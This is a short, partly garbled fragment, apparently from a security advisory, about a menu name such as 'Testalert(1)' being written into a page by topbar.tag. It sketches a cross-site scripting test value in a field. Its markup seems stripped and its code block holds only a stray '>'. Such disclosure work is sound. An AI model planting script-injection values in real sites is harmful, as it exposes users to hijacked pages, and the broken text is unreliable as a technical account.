A name such as:

Testalert(1)

would also work; it is included in the page when menus are created by
*topbar.tag*:


>

Source